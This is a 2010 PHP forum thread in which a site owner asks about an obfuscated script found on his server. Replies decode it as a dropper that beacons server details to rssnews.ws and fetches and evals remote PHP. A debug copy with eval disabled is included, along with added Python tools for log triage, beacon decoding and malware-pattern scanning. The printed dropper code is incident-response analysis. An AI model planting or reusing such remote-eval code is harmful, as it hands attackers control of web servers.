NeverPool, posted April 28, 2010 (https://forums.phpfreaks.com/topic/200028-help-found-this-in-my-website-no-idea-what-it-is/):

Hey, I need some serious help. I was going through my directories and I found the following code in my website. I have no idea what it is, where it came from, or what it does. If you can help me I'd greatly appreciate it! The code is too long to fit in the message so I will attach the file.

[attachment deleted by admin]
NeverPool (author), posted April 28, 2010:

After using a base64 decoder I found out that some of it leads to a website called "rssnews.ws"; upon investigation I find that the server is unresponsive. Still have no clue what this does. Here's the decoded code:

base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("rssnews.ws");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="k®œßtÛ]µÛÍÙ§iݸwŽ×¾õ") $f=$_REQUEST["id"];
if((include(base64_decode("http://ads.").$f.$z)));
else if($c=file_get_contents(base64_decode("http://7.").$f.$z))eval($c);
else{
    $cu=curl_init(base64_decode("http://71.").$f.$z);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $o=curl_exec($cu);
    curl_close($cu);
    eval($o);
};
die();
?>
Mchl, posted April 28, 2010:

Congratulations, you've got your site infected. Change your FTP passwords, as apparently someone has gained access to them. Also scan your PC in search of keyloggers etc. Do NOT store your passwords in FTP clients.
NeverPool (author), posted April 28, 2010:

Changed all my passwords, thanks.
PFMaBiSmAd, posted April 28, 2010:

The code attempts to A) read some remote PHP code and execute it on your server, and B) supply your server information to the rssnews.ws site so that it knows it found a site that files can be placed on. Three different sub-domains of the ....ws site are used so that it can determine which method(s) are available to get remote code to execute on your server (include, file_get_contents/eval, or curl/eval).

You need to find out how the file was placed on your server. The web server access log would help pin down how it was placed on your server (a file upload script, some other script (such as a CMS or forum that allows file upload), FTP, web hosting control panel, ...) and if it was accessed.
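The access-log review PFMaBiSmAd recommends, as an added example (not code from the thread or from any of its posters): it parses combined-format log lines, lists every request for the dropped file, flags the ones that carry the q/id parameters the script checks, and pulls out earlier requests from the same client (or any POST in the preceding hour) as candidate placement vectors. The log lines, file name and IP addresses are constructed; the log format is assumed to be Apache/nginx "combined".

```python
import posixpath
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format (assumed; adjust the regex if your
# host writes a different LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not taken from the thread). They sketch the
# sequence PFMaBiSmAd describes: an upload endpoint is hit, a new .php file is
# requested right after, and later the file is called with the q/id parameters.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2010:22:14:03 +0000] "POST /forum/upload.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [27/Apr/2010:22:14:09 +0000] "GET /images/cache.php HTTP/1.1" 200 48 "-" "Mozilla/4.0"
198.51.100.3 - - [28/Apr/2010:01:02:11 +0000] "GET /index.php HTTP/1.1" 200 10233 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Apr/2010:03:40:51 +0000] "GET /images/cache.php?q=xyz&id=198.51.100.77 HTTP/1.1" 200 31 "-" "-"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["params"] = parse_qs(parts.query)
    return entry


def triage(log_text, dropped_basename, window_minutes=60):
    """Return requests for the dropped file, the subset that carries the q/id
    trigger parameters, and earlier requests that could have placed the file."""
    entries = [e for e in (parse_line(line) for line in log_text.splitlines()) if e]
    hits = [e for e in entries if posixpath.basename(e["path"]) == dropped_basename]
    triggered = [e for e in hits if "q" in e["params"] and "id" in e["params"]]
    candidates = []
    if hits:
        first = min(hits, key=lambda e: e["ts"])
        for e in entries:
            if e is first or e["ts"] > first["ts"]:
                continue
            age = (first["ts"] - e["ts"]).total_seconds()
            # Same client shortly before the first access, or any POST (upload
            # form, CMS/forum attachment, control panel) inside the window.
            if age <= window_minutes * 60 and (e["ip"] == first["ip"] or e["method"] == "POST"):
                candidates.append(e)
    return {"hits": hits, "triggered": triggered, "candidates": candidates}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG, "cache.php")
    for label in ("hits", "triggered", "candidates"):
        print(label)
        for e in result[label]:
            print("  ", e["ts"].isoformat(), e["ip"], e["method"], e["target"])
```

Run it against the real log with the real file name; the "candidates" list is where to look for the upload script, forum attachment handler or control-panel request that wrote the file, and the "triggered" list tells you whether anyone ever drove the script through its q/id path.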
ChemicalBliss, posted April 28, 2010:

Yeah, this will give you the information from it:

<?php
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z = "/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);

// Debug: show every value the script collects
echo('a: '.$a.'<br />'
    .'b: '.$b.'<br />'
    .'c: '.$c.'<br />'
    .'d: '.$d.'<br />'
    .'e: '.$e.'<br />'
    .'f: '.$f.'<br />'
    .'g: '.$g.'<br />'
    .'h: '.$h.'<br />'
    .'i: '.$i.'<br />'
    .'j: '.$j.'<br />'
    .'z: '.$z.'<br />'
);

$f = base64_decode("cnNzbmV3cy53cw==");
// Debug
echo('f(2): '.$f.'<br />');

// Debug: the condition that lets a request override the target host
echo('basename($c) = '.basename($c).
    '<br />basename($i) = '.basename($i).
    '<br />$_REQUEST["q"] = '.$_REQUEST["q"].
    '<br />md5($_REQUEST["q"]) = '.md5($_REQUEST["q"]).
    '<br />MD5 Condition = a66c33902121280a2acdad24d44c1771'
);

if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="a66c33902121280a2acdad24d44c1771"){
    $f=$_REQUEST["id"];
}

// Debug: the three URLs the original script would try, in order
echo('Include: '.base64_decode("aHR0cDovL2Fkcy4=").$f.$z.'<br />'.
    'Otherwise - Get Contents: '.base64_decode("aHR0cDovLzcu").$f.$z.'<br />'.
    'Last Resort - Connect to '.base64_decode("aHR0cDovLzcxLg==").$f.$z);

// Disabled: include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)
if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)){
    // Debug
    echo($c);
    // eval($c); - Disabled
}else{
    $cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $o=curl_exec($cu);
    curl_close($cu);
    // eval($o); - Disabled
    // Debug
    echo($o);
}
die();
?>

Basically, it is a script that communicates with another website (you will find out from running this script now with the debug; it is PHP safe, no code will be executed). It will show you the code they are trying to execute. The script takes arguments too, so they can pass code directly, etc.
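An offline way to read the same information without contacting the remote host, as an added example (not code from the thread or its posters): it decodes the four base64 literals that appear in the script and unpacks a $z-style beacon string back into the named $_SERVER fields, which is what you would do with such a string found in a proxy or egress log. The field order and the literal "e" separator come from the script posted above; the sample server values are constructed.

```python
import base64

# Order in which the dropped script concatenates its fields into $z; the bare
# "e" token sits between REMOTE_ADDR and SCRIPT_FILENAME, exactly as posted.
BEACON_FIELDS = [
    "HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF", "QUERY_STRING",
    "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR", "e",
    "SCRIPT_FILENAME", "HTTP_ACCEPT_LANGUAGE",
]

# The base64 literals that appear in the posted script.
OBFUSCATED_LITERALS = [
    "cnNzbmV3cy53cw==", "aHR0cDovL2Fkcy4=", "aHR0cDovLzcu", "aHR0cDovLzcxLg==",
]


def decode_literals(literals=OBFUSCATED_LITERALS):
    """Map each base64 literal to its cleartext so the script can be read as written."""
    return {lit: base64.b64decode(lit).decode("utf-8", "replace") for lit in literals}


def build_beacon_query(fields):
    """Rebuild $z the way the script does ("/?" plus '.'-joined base64 tokens).
    Used here only to produce test input; missing fields encode as empty."""
    parts = []
    for name in BEACON_FIELDS:
        if name == "e":
            parts.append("e")
        else:
            parts.append(base64.b64encode(fields.get(name, "").encode()).decode())
    return "/?" + ".".join(parts)


def decode_beacon_query(z):
    """Split a beacon path-and-query back into its named $_SERVER fields.
    '.' is not in the base64 alphabet, so splitting on it is unambiguous."""
    query = z.split("?", 1)[1] if "?" in z else z
    tokens = query.split(".")
    if len(tokens) != len(BEACON_FIELDS) or tokens[8] != "e":
        raise ValueError("not a beacon string in the expected layout")
    fields = {}
    for name, tok in zip(BEACON_FIELDS, tokens):
        if name != "e":
            fields[name] = base64.b64decode(tok).decode("utf-8", "replace")
    return fields


if __name__ == "__main__":
    for lit, clear in decode_literals().items():
        print(f"{lit:18s} -> {clear}")
    # Constructed sample values; nothing here is taken from a real server.
    sample = {
        "HTTP_HOST": "www.example.com",
        "REQUEST_URI": "/images/cache.php?x=1",
        "REMOTE_ADDR": "192.0.2.10",
        "SCRIPT_FILENAME": "/var/www/html/images/cache.php",
    }
    z = build_beacon_query(sample)
    print(z)
    for name, value in decode_beacon_query(z).items():
        print(f"{name:22s} = {value!r}")
```

The decoded fields show exactly what the beacon reports: hostname, the script's URL and absolute path on disk, the visitor's address and headers. That is the inventory PFMaBiSmAd refers to when he says the remote site learns it "found a site that files can be placed on".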
NeverPool (author), posted April 28, 2010:

I've changed my passwords and I've started a system scan on my server computer. What are the chances of this being a serious thing and not just a bot that guessed my stuff?
PFMaBiSmAd, posted April 28, 2010:

It's always serious if someone was able to put a .php script file on your server and be able to request it to get the code in it to be executed. Even if your PHP settings prevent all three of the methods that script is trying to get remote code to be executed, the simple fact that any .php file can be placed on your server just means that the next file that gets put on your server will be a mini-control panel/file manager script that will allow someone to do anything they want on your site.

I would be checking if there are any other unexpected files on your server or if any of your expected files have been modified.
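One way to do the check PFMaBiSmAd suggests in his last sentence, as an added example (not code from the thread or its posters): hash every file under the web root against a saved baseline to list added, removed and modified files, then grep the new and changed ones for the constructs this dropper relies on (eval, base64_decode, fetching code over HTTP, an md5-gated request parameter, error_reporting(0)). The pattern names, the directory layout and the sample file contents are constructed; the baseline would normally come from a known-clean backup or a fresh copy of your CMS.

```python
import hashlib
import json
import os
import re
import tempfile

# Constructs the dropper in this thread relies on. Names are mine; a hit is a
# reason to open the file, not proof of infection on its own.
PATTERNS = {
    "eval": re.compile(rb"\beval\s*\(", re.I),
    "base64_decode": re.compile(rb"\bbase64_decode\s*\(", re.I),
    "remote_fetch": re.compile(
        rb"\b(file_get_contents|curl_init|include|require)\s*\(?\s*(base64_decode\s*\(|['\"]https?://)", re.I),
    "md5_gated_param": re.compile(rb"\bmd5\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b", re.I),
    "error_reporting_off": re.compile(rb"\berror_reporting\s*\(\s*0\s*\)", re.I),
}

# Constructed stand-in for a dropped file, shaped like the thread's script but
# with placeholder host and hash; it does nothing and is never executed here.
SAMPLE_DROPPER = (
    b'<?php error_reporting(0); $f=base64_decode("PLACEHOLDER_B64_HOST");\n'
    b'if(isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="00000000000000000000000000000000"){$f=$_REQUEST["id"];}\n'
    b'if($c=file_get_contents("http://7.".$f."/")) eval($c); die(); ?>'
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Relative path -> sha256 for every regular file under root."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hashes[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return hashes


def save_baseline(hashes, path):
    with open(path, "w") as fh:
        json.dump(hashes, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def diff_baseline(baseline, current):
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def scan_file(path):
    """Names of PATTERNS that match the file's bytes, sorted."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted(name for name, rx in PATTERNS.items() if rx.search(data))


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Build a tiny site, baseline it, then simulate a dropped file and a
    modified file and return the diff plus scan findings for the changes."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", b"<?php echo 'hello'; ?>")
        _write(root, "lib/db.php", b"<?php function q() {} ?>")
        baseline_path = os.path.join(root, "..", "baseline-demo.json")
        save_baseline(hash_tree(root), baseline_path)
        # What the thread describes: a new .php file appears and an existing one changes.
        _write(root, "images/cache.php", SAMPLE_DROPPER)
        _write(root, "index.php", b"<?php echo 'hello'; include('images/cache.php'); ?>")
        report = diff_baseline(load_baseline(baseline_path), hash_tree(root))
        findings = {p: scan_file(os.path.join(root, p)) for p in report["added"] + report["modified"]}
        os.remove(baseline_path)
        return report, findings


if __name__ == "__main__":
    report, findings = demo()
    print(json.dumps(report, indent=1))
    for path, names in findings.items():
        print(path, "->", ", ".join(names) or "no suspicious constructs")
```

On a real site, run hash_tree once against a clean copy and keep the JSON somewhere the web server cannot write; every later run then tells you what changed, and scan_file narrows the list to files worth reading by hand. The patterns will also fire on some legitimate code, so treat them as a triage aid rather than a verdict.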